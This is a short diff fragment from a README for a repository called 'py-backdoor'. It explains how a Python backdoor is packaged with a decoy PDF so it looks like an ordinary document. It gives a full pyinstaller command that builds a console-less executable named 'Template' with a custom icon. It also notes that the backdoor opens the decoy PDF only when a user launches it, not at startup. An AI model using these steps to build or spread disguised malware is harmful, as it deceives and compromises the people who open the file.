13HJoe/py-backdoor/README.md

 	  subprocess.call(file_name, shell = True)
 	  ```
    	- `_MEIPASS` : the path to the _internal folder within the bundle [ in this case, the Non-Malicious PDF ]
+   	- The Backdoor also checks if the current process is being run by a `user` or being run automatically on startup; If it is run by a `user` the PDF file is opened
 - **mask executable** with `.ICO`
 	- `pyinstaller --add-data "../dummy/Template.pdf:." --onefile --noconsole backdoor.py -n Template --icon <path-to-ico-file>`
 	- ![image.png](./assets/image_1722969936363_0.png)